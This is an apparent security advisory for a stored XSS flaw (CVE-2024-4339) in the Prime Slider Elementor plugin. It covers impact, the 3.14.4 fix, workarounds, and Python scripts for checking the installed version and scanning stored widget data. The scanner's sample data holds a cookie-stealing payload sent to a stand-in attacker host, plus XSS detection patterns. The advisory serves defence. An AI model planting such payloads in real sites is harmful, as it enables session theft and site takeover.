CVE-2024-4339
📋 TL;DR
This vulnerability is a stored cross-site scripting (XSS) flaw in the Prime Slider – Addons For Elementor WordPress plugin. An authenticated user with contributor-level access or higher can place a malicious script in a page through the plugin's General widget, because user-supplied widget attributes are not sufficiently sanitized on input and escaped on output. The script is stored with the page and runs in the browser of every visitor who views it, including logged-in administrators, which enables session hijacking, defacement, or malware distribution. Any WordPress site running a vulnerable version of the plugin (3.14.3 and earlier) is affected.
💻 Affected Systems
- Prime Slider – Addons For Elementor (WordPress plugin), versions 3.14.3 and earlier
📦 What is this software?
Prime Slider – Addons For Elementor is a slider and hero-section add-on for the Elementor page builder, developed by BdThemes. Its widgets, including the General widget affected here, are configured inside the Elementor editor, and their settings are stored with the page and rendered on every view.
⚠️ Risk & Real-World Impact
Worst Case
If an administrator views the poisoned page while logged in, the injected script runs with that administrator's session and can perform any action the admin can: create a new administrator account, install a backdoored plugin or theme, or edit theme files. That chain turns a contributor-level XSS into full compromise of the WordPress site and, through PHP execution on the host, potentially of the underlying server. Attackers could also redirect visitors to malicious sites or steal credentials entered on the page.
Likely Case
Site defacement, theft of session cookies or tokens leading to account takeover of whichever user views the page, or injection of cryptocurrency miners, adware, or drive-by redirects into visitors' browsers.
If Mitigated
If contributor-level and higher accounts are limited to trusted people, the attacker first has to obtain one of those accounts. A Content Security Policy that forbids inline scripts would stop the stored payload from executing at all, leaving only defacement through the non-script markup a contributor can insert; note, however, that such a policy is hard to deploy on Elementor-based sites (see Temporary Workarounds), so in practice role hygiene is the mitigation most sites can rely on.
🎯 Exploit Status
Exploitation requires an authenticated WordPress account with contributor-level or higher permissions; no unauthenticated path is described. Once authenticated, the attack is technically simple: the attacker enters the payload into a General widget field and saves the page, after which every view of that page executes it. The references above do not report exploitation in the wild.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.14.4 or later
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find 'Prime Slider – Addons For Elementor'.
4. Click 'Update Now' if available, or manually update to version 3.14.4 or later.
5. Clear any caching plugin and CDN caches so that pages are re-rendered with the patched plugin.
🔧 Temporary Workarounds
Disable Prime Slider Plugin
Temporarily deactivate the vulnerable plugin until it can be updated. Note that deactivating it removes the slider from every page that uses it, and that any payload already stored in a page's widget settings remains in the database and will render again when the plugin is reactivated, so check stored widget data before re-enabling (see Detection & Monitoring).
wp plugin deactivate bdthemes-prime-slider-lite
Restrict User Roles
Review every account with the contributor role or higher and remove or downgrade any that is not trusted. Until the patch is applied, treat contributor access as equivalent to the ability to run script in administrators' browsers. If you must keep untrusted contributors, have an administrator inspect draft pages only in a browser session that is not logged in as an administrator.
🧯 If You Can't Patch
- Implement Content Security Policy (CSP) headers to restrict script execution sources. To block this payload the policy must disallow inline scripts (no 'unsafe-inline' in script-src), which Elementor's own front-end output does not tolerate without careful nonce or hash work; test on a staging site before deploying.
- Install a Web Application Firewall (WAF) with XSS protection rules. The payload is written by an authenticated user through the Elementor editor, so the rules must inspect authenticated requests to wp-admin/admin-ajax.php as well as anonymous traffic, and a WAF filters only known patterns; it is a stopgap, not a fix.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for the Prime Slider – Addons For Elementor version. If the version is 3.14.3 or lower, the site is vulnerable.
Check Version:
wp plugin get bdthemes-prime-slider-lite --field=version
Verify Fix Applied:
Confirm Prime Slider plugin version is 3.14.4 or higher in WordPress admin panel.
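Where WP-CLI is not available (a backup, a forensic disk image, or a host without shell access to WordPress), the version can be read straight from the plugin's main PHP file, which declares it in a header comment. The script below is an added example, not part of the advisory or of the plugin: it parses that header, compares the version numerically against the first fixed release (a plain string comparison gets "3.9.0" versus "3.14.4" wrong), and reports whether the install is vulnerable. The plugin directory name comes from the changeset URL in the references; the exact path and the sample header it runs on are assumptions constructed for the example.

```python
import re
from pathlib import Path
from typing import Optional, Tuple

FIXED_VERSION = "3.14.4"   # first release carrying the fix for CVE-2024-4339
# Slug taken from the changeset URL in the references; the path assumes a
# standard WordPress layout and is run only if it exists.
PLUGIN_DIR = Path("wp-content/plugins/bdthemes-prime-slider-lite")

# Constructed sample of a WordPress plugin header comment (not the real plugin file).
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Prime Slider
 * Plugin URI: https://example.invalid/prime-slider
 * Description: constructed sample header for the version check
 * Version: 3.14.3
 * Author: bdthemes
 */
"""


def parse_version(text: str) -> Tuple[int, ...]:
    """'3.14.3' -> (3, 14, 3). Tuples compare numerically; as strings
    '3.9.0' > '3.14.4', which would wrongly report an old release as patched."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)          # tolerate suffixes such as 3.14.4-beta
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def header_version(php_source: str) -> Optional[str]:
    """Pull the Version: field out of a plugin header comment block."""
    m = re.search(r"^\s*\*?\s*Version:\s*(\S+)", php_source,
                  re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version predates the first fixed release."""
    return parse_version(installed) < parse_version(fixed)


def check_plugin_dir(plugin_dir: Path) -> Tuple[Optional[str], Optional[bool]]:
    """Locate the plugin's main file (the one carrying a 'Plugin Name:' header)
    and return (version, vulnerable); (None, None) if nothing usable is found."""
    for php in sorted(plugin_dir.glob("*.php")):
        src = php.read_text(errors="replace")
        if "Plugin Name:" in src:
            version = header_version(src)
            return version, (is_vulnerable(version) if version else None)
    return None, None


if __name__ == "__main__":
    v = header_version(SAMPLE_HEADER)
    print(f"sample header: version {v} -> "
          f"{'VULNERABLE' if v and is_vulnerable(v) else 'patched'}")
    if PLUGIN_DIR.is_dir():
        version, vuln = check_plugin_dir(PLUGIN_DIR)
        print(f"{PLUGIN_DIR}: version {version} -> vulnerable={vuln}")
```

Run it from the WordPress document root; on a live site the WP-CLI command above remains the simpler check, and the two should agree.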
📡 Detection & Monitoring
Log Indicators:
- POST requests to wp-admin/admin-ajax.php that save Elementor page data from accounts holding only the contributor role, especially outside normal editing hours or from unfamiliar IP addresses
- Script tags, inline event handlers (onerror=, onload=, ...) or javascript: URLs in stored page data. Elementor keeps widget settings as JSON in the wp_postmeta row with meta_key _elementor_data rather than in wp_posts.post_content, so check both tables.
Network Indicators:
- Unexpected inline scripts, or outbound requests to domains the site does not use, when a page containing a Prime Slider widget is loaded; visible in the browser developer tools Network tab
SIEM Query (starting point only; adapt the source and field names to your web-server log format):
source="wordpress.log" AND "prime-slider" AND ("POST" OR "script" OR "alert")
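Log indicators only show that a save happened; the stored widget data is where the payload actually sits. The script below is an added example, not part of the advisory, of Elementor or of the plugin. It walks the JSON tree that Elementor stores in the _elementor_data post meta (retrievable with `wp post meta get <post_id> _elementor_data`) and flags any setting value that contains a script tag, an inline event handler, a javascript: URL or similar active markup, reporting the post, widget type and setting path so the hit can be triaged. The widget type name 'prime-slider-general' and the sample document it runs on are assumptions constructed for the example; the detection patterns are generic to stored XSS and cover more than this one widget.

```python
import json
import re
import sys
from typing import Any, Dict, List

# Markers that have no business in slider text settings. The event-handler
# pattern is deliberately loose so it also catches attribute injection such
# as '" onmouseover="...' that arrives without an enclosing tag; expect to
# triage the occasional false positive.
SUSPICIOUS = [
    ("script_tag",     re.compile(r"<\s*script\b", re.I)),
    ("event_handler",  re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_url", re.compile(r"javascript\s*:", re.I)),
    ("data_url_html",  re.compile(r"data\s*:\s*text/html", re.I)),
    ("active_markup",  re.compile(r"<\s*(svg|iframe|object|embed)\b", re.I)),
]

# Constructed sample of an _elementor_data document (not taken from a real site):
# one section, one column, a Prime Slider General widget (the widgetType name is
# an assumption) holding a clean slide and a poisoned slide, plus a clean heading.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1", "elType": "section", "settings": {}, "elements": [
        {"id": "b2", "elType": "column", "settings": {}, "elements": [
            {"id": "c3", "elType": "widget", "widgetType": "prime-slider-general",
             "settings": {"slides": [
                 {"title": "Summer sale", "sub_title": "Up to 50% off"},
                 {"title": "<img src=x onerror=\"fetch('https://attacker.invalid/?c='"
                           "+document.cookie)\">",
                  "sub_title": "Click <a href=\"javascript:alert(document.domain)\">here</a>"},
             ]},
             "elements": []},
            {"id": "d4", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "Clean heading"}, "elements": []},
        ]},
    ]},
])


def _scan_value(value: Any, path: str, widget: str, findings: List[Dict]) -> None:
    """Recurse through a settings subtree; every string is tested against SUSPICIOUS."""
    if isinstance(value, str):
        for name, rx in SUSPICIOUS:
            if rx.search(value):
                findings.append({"widget": widget, "setting": path,
                                 "pattern": name, "snippet": value[:80]})
    elif isinstance(value, dict):
        for key, sub in value.items():
            _scan_value(sub, f"{path}.{key}" if path else key, widget, findings)
    elif isinstance(value, list):
        for i, sub in enumerate(value):
            _scan_value(sub, f"{path}[{i}]", widget, findings)


def _scan_elements(elements: List[Dict], findings: List[Dict]) -> None:
    """Walk the section/column/widget tree; only widgets carry a widgetType."""
    for el in elements:
        widget = el.get("widgetType") or el.get("elType", "?")
        _scan_value(el.get("settings") or {}, "", widget, findings)
        _scan_elements(el.get("elements") or [], findings)


def scan_elementor_data(post_id: int, raw_json: str) -> List[Dict]:
    """Return one finding per suspicious setting value in a post's _elementor_data."""
    findings: List[Dict] = []
    _scan_elements(json.loads(raw_json), findings)
    for f in findings:
        f["post_id"] = post_id
    return findings


if __name__ == "__main__":
    # Usage: python3 scan_elementor.py <post_id> <file>   where the file was
    # produced with:  wp post meta get <post_id> _elementor_data > <file>
    if len(sys.argv) == 3:
        post_id, raw = int(sys.argv[1]), open(sys.argv[2], encoding="utf-8").read()
    else:
        post_id, raw = 42, SAMPLE_ELEMENTOR_DATA
    for f in scan_elementor_data(post_id, raw):
        print(f"post {f['post_id']} widget={f['widget']} setting={f['setting']} "
              f"pattern={f['pattern']} snippet={f['snippet']!r}")
```

To sweep a whole site, list the post IDs that carry Elementor data (for example with `wp post list --post_type=any --format=ids`, then `wp post meta get` per ID) and feed each document through scan_elementor_data; a hit in a widget edited by a contributor-role account is the thing to escalate.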
🔗 References
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve